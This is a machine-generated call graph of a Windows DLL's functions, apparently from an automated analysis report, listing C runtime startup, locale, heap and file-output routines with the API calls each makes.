6c92f819 19112->19117 19119 6c92535b __dosmaperr 67 API calls 19113->19119 19114->19107 19115 6c92f70e WideCharToMultiByte 19114->19115 19121 6c92f745 WriteFile 19114->19121 19114->19130 19115->19104 19115->19121 19120 6c925348 __strnicoll_l 67 API calls 19116->19120 19162 6c92536e 19117->19162 19118 6c92f56c WriteFile 19118->19104 19118->19124 19119->19109 19125 6c92f80a 19120->19125 19121->19114 19127 6c92f77c GetLastError 19121->19127 19122 6c92f64c WriteFile 19122->19104 19122->19126 19124->19107 19124->19118 19124->19130 19128 6c92535b __dosmaperr 67 API calls 19125->19128 19126->19107 19126->19122 19126->19130 19127->19114 19128->19109 19130->19107 19130->19109 19130->19112 19131 6c931a88 11 API calls __putwch_nolock 19131->19135 19132 6c92f35b WideCharToMultiByte 19132->19130 19133 6c92f38c WriteFile 19132->19133 19133->19104 19133->19135 19134 6c930932 79 API calls __fassign 19134->19135 19135->19104 19135->19130 19135->19131 19135->19132 19135->19134 19136 6c92f3e0 WriteFile 19135->19136 19159 6c930984 19135->19159 19136->19104 19136->19135 19183 6c931a61 RtlLeaveCriticalSection 19137->19183 19139 6c92f952 19139->19028 19143 6c92a83a RtlLeaveCriticalSection 19140->19143 19142 6c931a5f 19142->19070 19143->19142 19167 6c93194a 19144->19167 19146 6c92efc5 19147 6c92efde SetFilePointer 19146->19147 19148 6c92efcd 19146->19148 19149 6c92eff6 GetLastError 19147->19149 19150 6c92efd2 19147->19150 19151 6c925348 __strnicoll_l 67 API calls 19148->19151 19149->19150 19152 6c92f000 19149->19152 19150->19088 19151->19150 19153 6c92536e __dosmaperr 67 API calls 19152->19153 19153->19150 19155 6c92a206 __getptd_noexit 67 API calls 19154->19155 19156 6c92a287 19155->19156 19157 6c92a294 GetConsoleMode 19156->19157 19158 6c925bff __amsg_exit 67 API calls 19156->19158 19157->19098 19157->19108 19158->19157 19180 6c93094c 19159->19180 19163 6c92535b __dosmaperr 67 API calls 19162->19163 19164 6c925379 __expand 19163->19164 19165 6c925348 __strnicoll_l 67 API calls 19164->19165 19166 6c92538c 19165->19166 19166->19109 19168 6c931957 19167->19168 19169 6c93196f 19167->19169 19170 6c92535b __dosmaperr 67 API calls 19168->19170 19172 6c92535b __dosmaperr 67 API calls 19169->19172 19179 6c9319b4 19169->19179 19171 6c93195c 19170->19171 19173 6c925348 __strnicoll_l 67 API calls 19171->19173 19174 6c93199d 19172->19174 19175 6c931964 19173->19175 19176 6c925348 __strnicoll_l 67 API calls 19174->19176 19175->19146 19177 6c9319a4 19176->19177 19178 6c92815c __strnicoll_l 6 API calls 19177->19178 19178->19179 19179->19146 19181 6c928659 _LocaleUpdate::_LocaleUpdate 77 API calls 19180->19181 19182 6c93095f 19181->19182 19182->19135 19183->19139 19187 6c931a61 RtlLeaveCriticalSection 19184->19187 19186 6c92f143 19186->19057 19187->19186 19189 6c917352 __EH_prolog3_catch_GS 19188->19189 19190 6c917381 ctype 19189->19190 19191 6c917202 ctype 2 API calls 19189->19191 19194 6c9251c4 19190->19194 19191->19190 19195 6c923f34 __cftof_l 5 API calls 19194->19195 19196 6c9251ce 19195->19196 19196->19196 19197 6c92498c 19198 6c924997 19197->19198 19199 6c92499c 19197->19199 19215 6c92be02 19198->19215 19203 6c924896 19199->19203 19202 6c9249aa 19204 6c9248a2 __mtinitlocknum 19203->19204 19209 6c9248ef 19204->19209 19213 6c92493f __mtinitlocknum 19204->19213 19219 6c924761 19204->19219 19208 6c92491f 19211 6c924761 __CRT_INIT@12 156 API calls 19208->19211 19208->19213 19209->19213 19266 6c916894 19209->19266 19210 6c916894 ___DllMainCRTStartup 31 API calls 19212 6c924916 19210->19212 19211->19213 19214 6c924761 __CRT_INIT@12 156 API calls 19212->19214 19213->19202 19214->19208 19216 6c92be27 19215->19216 19217 6c92be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19215->19217 19216->19217 19218 6c92be2b 19216->19218 19217->19218 19218->19199 19220 6c924770 19219->19220 19221 6c9247ec 19219->19221 19270 6c92a6f4 HeapCreate 19220->19270 19223 6c924823 19221->19223 19228 6c9247f2 19221->19228 19224 6c924881 19223->19224 19225 6c924828 19223->19225 19230 6c92477b 19224->19230 19406 6c92a3c8 19224->19406 19226 6c92a0ae ___set_flsgetvalue 8 API calls 19225->19226 19232 6c92482d 19226->19232 19229 6c92480d 19228->19229 19228->19230 19403 6c925e85 19228->19403 19229->19230 19237 6c92b77d __ioterm 68 API calls 19229->19237 19230->19209 19235 6c92a608 __calloc_crt 67 API calls 19232->19235 19238 6c924839 19235->19238 19236 6c924787 __RTC_Initialize 19239 6c92478b 19236->19239 19245 6c924797 GetCommandLineA 19236->19245 19240 6c924817 19237->19240 19238->19230 19243 6c92a033 __decode_pointer 6 API calls 19238->19243 19381 6c92a724 19239->19381 19242 6c92a0e2 __mtterm 70 API calls 19240->19242 19244 6c92481c 19242->19244 19246 6c924857 19243->19246 19247 6c92a724 __heap_term 4 API calls 19244->19247 19306 6c92bafe 19245->19306 19252 6c924875 19246->19252 19253 6c92485e 19246->19253 19247->19230 19251 6c9247b1 19254 6c9247b5 19251->19254 19347 6c92ba43 19251->19347 19256 6c924618 __mtinitlocknum 67 API calls 19252->19256 19255 6c92a11f __getptd_noexit 67 API calls 19253->19255 19387 6c92a0e2 19254->19387 19259 6c924865 GetCurrentThreadId 19255->19259 19256->19230 19259->19230 19261 6c9247d5 19261->19230 19398 6c92b77d 19261->19398 19267 6c9168a2 19266->19267 19269 6c9167cb 19266->19269 19268 6c91aef1 ctype 31 API calls 19267->19268 19267->19269 19268->19269 19269->19208 19269->19210 19271 6c924776 19270->19271 19271->19230 19272 6c92a436 GetModuleHandleW 19271->19272 19273 6c92a451 19272->19273 19274 6c92a44a 19272->19274 19275 6c92a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19273->19275 19276 6c92a5b9 19273->19276 19277 6c925bcf __crt_waiting_on_module_handle 2 API calls 19274->19277 19278 6c92a4a4 TlsAlloc 19275->19278 19279 6c92a0e2 __mtterm 70 API calls 19276->19279 19280 6c92a450 19277->19280 19282 6c92a5be 19278->19282 19283 6c92a4f2 TlsSetValue 19278->19283 19279->19282 19280->19273 19282->19236 19283->19282 19284 6c92a503 19283->19284 19417 6c925e94 19284->19417 19287 6c929fb8 __encode_pointer 6 API calls 19288 6c92a513 19287->19288 19289 6c929fb8 __encode_pointer 6 API calls 19288->19289 19290 6c92a523 19289->19290 19291 6c929fb8 __encode_pointer 6 API calls 19290->19291 19292 6c92a533 19291->19292 19293 6c929fb8 __encode_pointer 6 API calls 19292->19293 19294 6c92a543 19293->19294 19424 6c92a798 19294->19424 19297 6c92a033 __decode_pointer 6 API calls 19298 6c92a564 19297->19298 19298->19276 19299 6c92a608 __calloc_crt 67 API calls 19298->19299 19300 6c92a57d 19299->19300 19300->19276 19301 6c92a033 __decode_pointer 6 API calls 19300->19301 19302 6c92a597 19301->19302 19302->19276 19303 6c92a59e 19302->19303 19304 6c92a11f __getptd_noexit 67 API calls 19303->19304 19305 6c92a5a6 GetCurrentThreadId 19304->19305 19305->19282 19307 6c92bb1c GetEnvironmentStringsW 19306->19307 19311 6c92bb3b 19306->19311 19308 6c92bb30 GetLastError 19307->19308 19309 6c92bb24 19307->19309 19308->19311 19312 6c92bb66 WideCharToMultiByte 19309->19312 19313 6c92bb57 GetEnvironmentStringsW 19309->19313 19310 6c92bbd4 19314 6c92bbdd GetEnvironmentStrings 19310->19314 19315 6c9247a7 19310->19315 19311->19309 19311->19310 19318 6c92bb9a 19312->19318 19319 6c92bbc9 FreeEnvironmentStringsW 19312->19319 19313->19312 19313->19315 19314->19315 19316 6c92bbed 19314->19316 19332 6c92b529 19315->19332 19321 6c92a5c3 __malloc_crt 67 API calls 19316->19321 19322 6c92a5c3 __malloc_crt 67 API calls 19318->19322 19319->19315 19323 6c92bc07 19321->19323 19324 6c92bba0 19322->19324 19325 6c92bc1a ___crtGetEnvironmentStringsA 19323->19325 19326 6c92bc0e FreeEnvironmentStringsA 19323->19326 19324->19319 19327 6c92bba8 WideCharToMultiByte 19324->19327 19329 6c92bc24 FreeEnvironmentStringsA 19325->19329 19326->19315 19328 6c92bbba 19327->19328 19331 6c92bbc2 19327->19331 19330 6c924618 __mtinitlocknum 67 API calls 19328->19330 19329->19315 19330->19331 19331->19319 19431 6c9253bc 19332->19431 19334 6c92b535 GetStartupInfoA 19335 6c92a608 __calloc_crt 67 API calls 19334->19335 19342 6c92b556 19335->19342 19336 6c92b774 __mtinitlocknum 19336->19251 19337 6c92b6f1 GetStdHandle 19341 6c92b6bb 19337->19341 19338 6c92b756 SetHandleCount 19338->19336 19339 6c92a608 __calloc_crt 67 API calls 19339->19342 19340 6c92b703 GetFileType 19340->19341 19341->19336 19341->19337 19341->19338 19341->19340 19345 6c92e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19341->19345 19342->19336 19342->19339 19342->19341 19343 6c92b63e 19342->19343 19343->19336 19343->19341 19344 6c92b667 GetFileType 19343->19344 19346 6c92e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19343->19346 19344->19343 19345->19341 19346->19343 19348 6c92ba58 19347->19348 19349 6c92ba5d GetModuleFileNameA 19347->19349 19438 6c9302ad 19348->19438 19351 6c92ba84 19349->19351 19432 6c92b8a9 19351->19432 19353 6c9247c1 19353->19261 19360 6c92b7cb 19353->19360 19355 6c92bac0 19356 6c92a5c3 __malloc_crt 67 API calls 19355->19356 19357 6c92bac6 19356->19357 19357->19353 19358 6c92b8a9 _parse_cmdline 77 API calls 19357->19358 19359 6c92bae0 19358->19359 19359->19353 19361 6c92b7d4 19360->19361 19364 6c92b7d9 _strlen 19360->19364 19362 6c9302ad ___initmbctable 111 API calls 19361->19362 19362->19364 19363 6c9247ca 19363->19261 19375 6c925cbe 19363->19375 19364->19363 19365 6c92a608 __calloc_crt 67 API calls 19364->19365 19370 6c92b80e _strlen 19365->19370 19366 6c92b86c 19367 6c924618 __mtinitlocknum 67 API calls 19366->19367 19367->19363 19368 6c92a608 __calloc_crt 67 API calls 19368->19370 19369 6c92b892 19371 6c924618 __mtinitlocknum 67 API calls 19369->19371 19370->19363 19370->19366 19370->19368 19370->19369 19372 6c930997 _strcpy_s 67 API calls 19370->19372 19373 6c92b853 19370->19373 19371->19363 19372->19370 19373->19370 19374 6c928034 __invoke_watson 10 API calls 19373->19374 19374->19373 19376 6c925ccc __IsNonwritableInCurrentImage 19375->19376 19725 6c92df82 19376->19725 19378 6c925cea __initterm_e 19380 6c925d09 __IsNonwritableInCurrentImage __initterm 19378->19380 19729 6c9244b4 19378->19729 19380->19261 19382 6c92a784 HeapDestroy 19381->19382 19383 6c92a72d 19381->19383 19382->19230 19384 6c92a772 HeapFree 19383->19384 19385 6c92a749 VirtualFree HeapFree 19383->19385 19384->19382 19385->19385 19386 6c92a771 19385->19386 19386->19384 19388 6c92a0f8 19387->19388 19389 6c92a0ec 19387->19389 19391 6c92a10c TlsFree 19388->19391 19392 6c92a11a 19388->19392 19390 6c92a033 __decode_pointer 6 API calls 19389->19390 19390->19388 19391->19392 19393 6c92a7ff RtlDeleteCriticalSection 19392->19393 19394 6c92a817 19392->19394 19395 6c924618 __mtinitlocknum 67 API calls 19393->19395 19396 6c92a829 RtlDeleteCriticalSection 19394->19396 19397 6c92a837 19394->19397 19395->19392 19396->19394 19397->19239 19399 6c92b786 19398->19399 19400 6c92b7c8 19399->19400 19401 6c92b79a RtlDeleteCriticalSection 19399->19401 19402 6c924618 __mtinitlocknum 67 API calls 19399->19402 19400->19254 19401->19399 19402->19399 19775 6c925d43 19403->19775 19405 6c925e90 19405->19229 19407 6c92a421 19406->19407 19408 6c92a3d6 19406->19408 19409 6c92a434 19407->19409 19410 6c92a42b TlsSetValue 19407->19410 19411 6c92a3ff 19408->19411 19412 6c92a3dc TlsGetValue 19408->19412 19409->19230 19410->19409 19413 6c92a033 __decode_pointer 6 API calls 19411->19413 19412->19411 19414 6c92a3ef TlsGetValue 19412->19414 19415 6c92a416 19413->19415 19414->19411 19798 6c92a299 19415->19798 19418 6c92a02a __is_LFH_enabled 6 API calls 19417->19418 19419 6c925e9c __init_pointers __initp_misc_winsig 19418->19419 19428 6c92cdf3 19419->19428 19422 6c929fb8 __encode_pointer 6 API calls 19423 6c925ed8 19422->19423 19423->19287 19425 6c92a7a3 19424->19425 19426 6c92e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19425->19426 19427 6c92a550 19425->19427 19426->19425 19427->19276 19427->19297 19429 6c929fb8 __encode_pointer 6 API calls 19428->19429 19430 6c925ece 19429->19430 19430->19422 19431->19334 19434 6c92b8c8 19432->19434 19436 6c92b935 19434->19436 19442 6c930a52 19434->19442 19435 6c92ba33 19435->19353 19435->19355 19436->19435 19437 6c930a52 77 API calls _parse_cmdline 19436->19437 19437->19436 19439 6c9302b6 19438->19439 19440 6c9302bd 19438->19440 19547 6c930113 19439->19547 19440->19349 19445 6c9309ff 19442->19445 19448 6c928659 19445->19448 19449 6c92866c 19448->19449 19455 6c9286b9 19448->19455 19450 6c92a27f __getptd 67 API calls 19449->19450 19451 6c928671 19450->19451 19452 6c928699 19451->19452 19456 6c93057a 19451->19456 19452->19455 19471 6c92fe0e 19452->19471 19455->19434 19457 6c930586 __mtinitlocknum 19456->19457 19458 6c92a27f __getptd 67 API calls 19457->19458 19459 6c93058b 19458->19459 19460 6c9305b9 19459->19460 19462 6c93059d 19459->19462 19461 6c92a914 __lock 67 API calls 19460->19461 19463 6c9305c0 19461->19463 19464 6c92a27f __getptd 67 API calls 19462->19464 19487 6c93053c 19463->19487 19466 6c9305a2 19464->19466 19468 6c9305b0 __mtinitlocknum 19466->19468 19470 6c925bff __amsg_exit 67 API calls 19466->19470 19468->19452 19470->19468 19472 6c92fe1a __mtinitlocknum 19471->19472 19473 6c92a27f __getptd 67 API calls 19472->19473 19474 6c92fe1f 19473->19474 19475 6c92a914 __lock 67 API calls 19474->19475 19476 6c92fe31 19474->19476 19477 6c92fe4f 19475->19477 19478 6c92fe3f __mtinitlocknum 19476->19478 19480 6c925bff __amsg_exit 67 API calls 19476->19480 19479 6c92fe98 19477->19479 19482 6c92fe80 InterlockedIncrement 19477->19482 19483 6c92fe66 InterlockedDecrement 19477->19483 19478->19455 19543 6c92fea9 19479->19543 19480->19478 19482->19479 19483->19482 19484 6c92fe71 19483->19484 19484->19482 19485 6c924618 __mtinitlocknum 67 API calls 19484->19485 19486 6c92fe7f 19485->19486 19486->19482 19488 6c930540 19487->19488 19494 6c930572 19487->19494 19489 6c930414 ___addlocaleref 8 API calls 19488->19489 19488->19494 19490 6c930553 19489->19490 19490->19494 19498 6c9304a3 19490->19498 19495 6c9305e4 19494->19495 19542 6c92a83a RtlLeaveCriticalSection 19495->19542 19497 6c9305eb 19497->19466 19499 6c930537 19498->19499 19500 6c9304b4 InterlockedDecrement 19498->19500 19499->19494 19512 6c9302cb 19499->19512 19501 6c9304c9 InterlockedDecrement 19500->19501 19502 6c9304cc 19500->19502 19501->19502 19503 6c9304d6 InterlockedDecrement 19502->19503 19504 6c9304d9 19502->19504 19503->19504 19505 6c9304e3 InterlockedDecrement 19504->19505 19506 6c9304e6 19504->19506 19505->19506 19507 6c9304f0 InterlockedDecrement 19506->19507 19509 6c9304f3 19506->19509 19507->19509 19508 6c93050c InterlockedDecrement 19508->19509 19509->19508 19510 6c930527 InterlockedDecrement 19509->19510 19511 6c93051c InterlockedDecrement 19509->19511 19510->19499 19511->19509 19513 6c93034f 19512->19513 19515 6c9302e2 19512->19515 19514 6c924618 __mtinitlocknum 67 API calls 19513->19514 19516 6c93039c 19513->19516 19517 6c930370 19514->19517 19515->19513 19522 6c930316 19515->19522 19525 6c924618 __mtinitlocknum 67 API calls 19515->19525 19518 6c932365 ___free_lc_time 67 API calls 19516->19518 19532 6c9303c3 19516->19532 19519 6c924618 __mtinitlocknum 67 API calls 19517->19519 19520 6c9303bc 19518->19520 19521 6c930383 19519->19521 19526 6c924618 __mtinitlocknum 67 API calls 19520->19526 19527 6c924618 __mtinitlocknum 67 API calls 19521->19527 19528 6c924618 __mtinitlocknum 67 API calls 19522->19528 19541 6c930337 19522->19541 19523 6c924618 __mtinitlocknum 67 API calls 19529 6c930344 19523->19529 19524 6c930408 19530 6c924618 __mtinitlocknum 67 API calls 19524->19530 19531 6c93030b 19525->19531 19526->19532 19535 6c930391 19527->19535 19536 6c93032c 19528->19536 19538 6c924618 __mtinitlocknum 67 API calls 19529->19538 19533 6c93040e 19530->19533 19534 6c93253f ___free_lconv_mon 67 API calls 19531->19534 19532->19524 19537 6c924618 67 API calls __mtinitlocknum 19532->19537 19533->19494 19534->19522 19539 6c924618 __mtinitlocknum 67 API calls 19535->19539 19540 6c9324fa ___free_lconv_num 67 API calls 19536->19540 19537->19532 19538->19513 19539->19516 19540->19541 19541->19523 19542->19497 19546 6c92a83a RtlLeaveCriticalSection 19543->19546 19545 6c92feb0 19545->19476 19546->19545 19548 6c93011f __mtinitlocknum 19547->19548 19549 6c92a27f __getptd 67 API calls 19548->19549 19550 6c930128 19549->19550 19551 6c92fe0e _LocaleUpdate::_LocaleUpdate 69 API calls 19550->19551 19552 6c930132 19551->19552 19578 6c92feb2 19552->19578 19555 6c92a5c3 __malloc_crt 67 API calls 19556 6c930153 19555->19556 19557 6c930272 __mtinitlocknum 19556->19557 19585 6c92ff2e 19556->19585 19557->19440 19560 6c930183 InterlockedDecrement 19562 6c930193 19560->19562 19563 6c9301a4 InterlockedIncrement 19560->19563 19561 6c93027f 19561->19557 19565 6c930292 19561->19565 19566 6c924618 __mtinitlocknum 67 API calls 19561->19566 19562->19563 19568 6c924618 __mtinitlocknum 67 API calls 19562->19568 19563->19557 19564 6c9301ba 19563->19564 19564->19557 19570 6c92a914 __lock 67 API calls 19564->19570 19567 6c925348 __strnicoll_l 67 API calls 19565->19567 19566->19565 19567->19557 19569 6c9301a3 19568->19569 19569->19563 19572 6c9301ce InterlockedDecrement 19570->19572 19573 6c93024a 19572->19573 19574 6c93025d InterlockedIncrement 19572->19574 19573->19574 19576 6c924618 __mtinitlocknum 67 API calls 19573->19576 19595 6c930274 19574->19595 19577 6c93025c 19576->19577 19577->19574 19579 6c928659 _LocaleUpdate::_LocaleUpdate 77 API calls 19578->19579 19580 6c92fec6 19579->19580 19581 6c92fed1 GetOEMCP 19580->19581 19582 6c92feef 19580->19582 19584 6c92fee1 19581->19584 19583 6c92fef4 GetACP 19582->19583 19582->19584 19583->19584 19584->19555 19584->19557 19586 6c92feb2 getSystemCP 79 API calls 19585->19586 19587 6c92ff4e 19586->19587 19588 6c92ff59 setSBCS 19587->19588 19590 6c92ff9d IsValidCodePage 19587->19590 19593 6c92ffc2 _memset __setmbcp_nolock 19587->19593 19589 6c923f34 __cftof_l 5 API calls 19588->19589 19591 6c930111 19589->19591 19590->19588 19592 6c92ffaf GetCPInfo 19590->19592 19591->19560 19591->19561 19592->19588 19592->19593 19598 6c92fc7b GetCPInfo 19593->19598 19724 6c92a83a RtlLeaveCriticalSection 19595->19724 19597 6c93027b 19597->19557 19599 6c92fd61 19598->19599 19603 6c92fcaf _memset 19598->19603 19602 6c923f34 __cftof_l 5 API calls 19599->19602 19605 6c92fe0c 19602->19605 19608 6c932323 19603->19608 19605->19593 19607 6c932124 ___crtLCMapStringA 102 API calls 19607->19599 19609 6c928659 _LocaleUpdate::_LocaleUpdate 77 API calls 19608->19609 19610 6c932336 19609->19610 19618 6c932169 19610->19618 19613 6c932124 19614 6c928659 _LocaleUpdate::_LocaleUpdate 77 API calls 19613->19614 19615 6c932137 19614->19615 19677 6c931d7f 19615->19677 19619 6c9321b5 19618->19619 19620 6c93218a GetStringTypeW 19618->19620 19621 6c93229c 19619->19621 19622 6c9321a2 19619->19622 19620->19622 19623 6c9321aa GetLastError 19620->19623 19646 6c934dbc GetLocaleInfoA 19621->19646 19624 6c9321ee MultiByteToWideChar 19622->19624 19641 6c932296 19622->19641 19623->19619 19631 6c93221b 19624->19631 19624->19641 19627 6c923f34 __cftof_l 5 API calls 19628 6c92fd1c 19627->19628 19628->19613 19629 6c9322ed GetStringTypeA 19634 6c932308 19629->19634 19629->19641 19630 6c932230 _memset ___convertcp 19633 6c932269 MultiByteToWideChar 19630->19633 19630->19641 19631->19630 19635 6c9249fe _malloc 67 API calls 19631->19635 19636 6c932290 19633->19636 19637 6c93227f GetStringTypeW 19633->19637 19638 6c924618 __mtinitlocknum 67 API calls 19634->19638 19635->19630 19642 6c931006 19636->19642 19637->19636 19638->19641 19641->19627 19643 6c931012 19642->19643 19644 6c931023 19642->19644 19643->19644 19645 6c924618 __mtinitlocknum 67 API calls 19643->19645 19644->19641 19645->19644 19647 6c934dea 19646->19647 19648 6c934def 19646->19648 19650 6c923f34 __cftof_l 5 API calls 19647->19650 19649 6c931026 __tzset_nolock 90 API calls 19648->19649 19649->19647 19651 6c9322c0 19650->19651 19651->19629 19651->19641 19652 6c934e05 19651->19652 19653 6c934e45 GetCPInfo 19652->19653 19654 6c934ecf 19652->19654 19655 6c934eba MultiByteToWideChar 19653->19655 19656 6c934e5c 19653->19656 19657 6c923f34 __cftof_l 5 API calls 19654->19657 19655->19654 19661 6c934e75 _strlen 19655->19661 19656->19655 19658 6c934e62 GetCPInfo 19656->19658 19659 6c9322e1 19657->19659 19658->19655 19660 6c934e6f 19658->19660 19659->19629 19659->19641 19660->19655 19660->19661 19662 6c9249fe _malloc 67 API calls 19661->19662 19664 6c934ea7 _memset ___convertcp 19661->19664 19662->19664 19663 6c934f04 MultiByteToWideChar 19665 6c934f3b 19663->19665 19666 6c934f1c 19663->19666 19664->19654 19664->19663 19669 6c931006 __freea 67 API calls 19665->19669 19667 6c934f23 WideCharToMultiByte 19666->19667 19668 6c934f40 19666->19668 19667->19665 19670 6c934f4b WideCharToMultiByte 19668->19670 19671 6c934f5f 19668->19671 19669->19654 19670->19665 19670->19671 19672 6c92a608 __calloc_crt 67 API calls 19671->19672 19673 6c934f67 19672->19673 19673->19665 19674 6c934f70 WideCharToMultiByte 19673->19674 19674->19665 19675 6c934f82 19674->19675 19676 6c924618 __mtinitlocknum 67 API calls 19675->19676 19676->19665 19678 6c931da0 LCMapStringW 19677->19678 19681 6c931dbb 19677->19681 19679 6c931dc3 GetLastError 19678->19679 19678->19681 19679->19681 19680 6c931fb9 19683 6c934dbc ___ansicp 91 API calls 19680->19683 19681->19680 19682 6c931e15 19681->19682 19684 6c931e2e MultiByteToWideChar 19682->19684 19701 6c931fb0 19682->19701 19687 6c931fe1 19683->19687 19686 6c931e5b 19684->19686 19684->19701 19685 6c923f34 __cftof_l 5 API calls 19688 6c92fd3c 19685->19688 19697 6c9249fe _malloc 67 API calls 19686->19697 19705 6c931e74 ___convertcp 19686->19705 19689 6c9320d5 LCMapStringA 19687->19689 19690 6c931ffa 19687->19690 19687->19701 19688->19607 19692 6c932031 19689->19692 19693 6c934e05 ___convertcp 74 API calls 19690->19693 19691 6c931eac MultiByteToWideChar 19694 6c931ec5 LCMapStringW 19691->19694 19695 6c931fa7 19691->19695 19696 6c9320fc 19692->19696 19700 6c924618 __mtinitlocknum 67 API calls 19692->19700 19698 6c93200c 19693->19698 19694->19695 19699 6c931ee6 19694->19699 19703 6c931006 __freea 67 API calls 19695->19703 19696->19701 19706 6c924618 __mtinitlocknum 67 API calls 19696->19706 19697->19705 19698->19701 19702 6c932016 LCMapStringA 19698->19702 19704 6c931eef 19699->19704 19710 6c931f18 19699->19710 19700->19696 19701->19685 19702->19692 19708 6c932038 19702->19708 19703->19701 19704->19695 19707 6c931f01 LCMapStringW 19704->19707 19705->19691 19705->19701 19706->19701 19707->19695 19711 6c932049 _memset ___convertcp 19708->19711 19712 6c9249fe _malloc 67 API calls 19708->19712 19709 6c931f67 LCMapStringW 19713 6c931fa1 19709->19713 19714 6c931f7f WideCharToMultiByte 19709->19714 19715 6c931f33 ___convertcp 19710->19715 19716 6c9249fe _malloc 67 API calls 19710->19716 19711->19692 19718 6c932087 LCMapStringA 19711->19718 19712->19711 19717 6c931006 __freea 67 API calls 19713->19717 19714->19713 19715->19695 19715->19709 19716->19715 19717->19695 19720 6c9320a3 19718->19720 19721 6c9320a7 19718->19721 19723 6c931006 __freea 67 API calls 19720->19723 19722 6c934e05 ___convertcp 74 API calls 19721->19722 19722->19720 19723->19692 19724->19597 19726 6c92df88 19725->19726 19727 6c929fb8 __encode_pointer 6 API calls 19726->19727 19728 6c92dfa0 19726->19728 19727->19726 19728->19378 19732 6c924478 19729->19732 19731 6c9244c1 19731->19380 19733 6c924484 __mtinitlocknum 19732->19733 19740 6c925c6b 19733->19740 19739 6c9244a5 __mtinitlocknum 19739->19731 19741 6c92a914 __lock 67 API calls 19740->19741 19742 6c924489 19741->19742 19743 6c92438d 19742->19743 19744 6c92a033 __decode_pointer 6 API calls 19743->19744 19745 6c9243a1 19744->19745 19746 6c92a033 __decode_pointer 6 API calls 19745->19746 19747 6c9243b1 19746->19747 19748 6c927637 __recalloc 68 API calls 19747->19748 19758 6c924434 19747->19758 19750 6c9243cf 19748->19750 19749 6c929fb8 __encode_pointer 6 API calls 19753 6c924429 19749->19753 19751 6c9243ea 19750->19751 19752 6c9243f9 19750->19752 19762 6c92441b 19750->19762 19766 6c92a654 19751->19766 19755 6c9243f3 19752->19755 19752->19758 19756 6c929fb8 __encode_pointer 6 API calls 19753->19756 19755->19752 19757 6c92a654 __realloc_crt 73 API calls 19755->19757 19759 6c92440f 19755->19759 19756->19758 19760 6c924409 19757->19760 19763 6c9244ae 19758->19763 19761 6c929fb8 __encode_pointer 6 API calls 19759->19761 19760->19758 19760->19759 19761->19762 19762->19749 19771 6c925c74 19763->19771 19770 6c92a65d 19766->19770 19767 6c924ac8 _realloc 72 API calls 19767->19770 19768 6c92a69c 19768->19755 19769 6c92a67d Sleep 19769->19770 19770->19767 19770->19768 19770->19769 19774 6c92a83a RtlLeaveCriticalSection 19771->19774 19773 6c9244b3 19773->19739 19774->19773 19776 6c925d4f __mtinitlocknum 19775->19776 19777 6c92a914 __lock 67 API calls 19776->19777 19778 6c925d56 19777->19778 19780 6c92a033 __decode_pointer 6 API calls 19778->19780 19784 6c925e0f __initterm 19778->19784 19782 6c925d8d 19780->19782 19782->19784 19786 6c92a033 __decode_pointer 6 API calls 19782->19786 19783 6c925e57 __mtinitlocknum 19783->19405 19792 6c925e5a 19784->19792 19790 6c925da2 19786->19790 19787 6c925e4e 19788 6c925c53 _malloc 3 API calls 19787->19788 19788->19783 19789 6c92a02a 6 API calls __is_LFH_enabled 19789->19790 19790->19784 19790->19789 19791 6c92a033 6 API calls __decode_pointer 19790->19791 19791->19790 19793 6c925e60 19792->19793 19794 6c925e3b 19792->19794 19797 6c92a83a RtlLeaveCriticalSection 19793->19797 19794->19783 19796 6c92a83a RtlLeaveCriticalSection 19794->19796 19796->19787 19797->19794 19799 6c92a2a5 __mtinitlocknum 19798->19799 19800 6c92a2bd 19799->19800 19801 6c92a3a7 __mtinitlocknum 19799->19801 19802 6c924618 __mtinitlocknum 67 API calls 19799->19802 19803 6c92a2cb 19800->19803 19804 6c924618 __mtinitlocknum 67 API calls 19800->19804 19801->19407 19802->19800 19805 6c92a2d9 19803->19805 19806 6c924618 __mtinitlocknum 67 API calls 19803->19806 19804->19803 19807 6c92a2e7 19805->19807 19808 6c924618 __mtinitlocknum 67 API calls 19805->19808 19806->19805 19809 6c92a2f5 19807->19809 19810 6c924618 __mtinitlocknum 67 API calls 19807->19810 19808->19807 19811 6c92a303 19809->19811 19812 6c924618 __mtinitlocknum 67 API calls 19809->19812 19810->19809 19813 6c92a311 19811->19813 19814 6c924618 __mtinitlocknum 67 API calls 19811->19814 19812->19811 19815 6c92a322 19813->19815 19816 6c924618 __mtinitlocknum 67 API calls 19813->19816 19814->19813 19817 6c92a914 __lock 67 API calls 19815->19817 19816->19815 19818 6c92a32a 19817->19818 19819 6c92a34f 19818->19819 19820 6c92a336 InterlockedDecrement 19818->19820 19834 6c92a3b3 19819->19834 19820->19819 19821 6c92a341 19820->19821 19821->19819 19824 6c924618 __mtinitlocknum 67 API calls 19821->19824 19824->19819 19825 6c92a914 __lock 67 API calls 19826 6c92a363 19825->19826 19827 6c92a394 19826->19827 19828 6c9304a3 ___removelocaleref 8 API calls 19826->19828 19837 6c92a3bf 19827->19837 19832 6c92a378 19828->19832 19831 6c924618 __mtinitlocknum 67 API calls 19831->19801 19832->19827 19833 6c9302cb ___freetlocinfo 67 API calls 19832->19833 19833->19827 19840 6c92a83a RtlLeaveCriticalSection 19834->19840 19836 6c92a35c 19836->19825 19841 6c92a83a RtlLeaveCriticalSection 19837->19841 19839 6c92a3a1 19839->19831 19840->19836 19841->19839

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
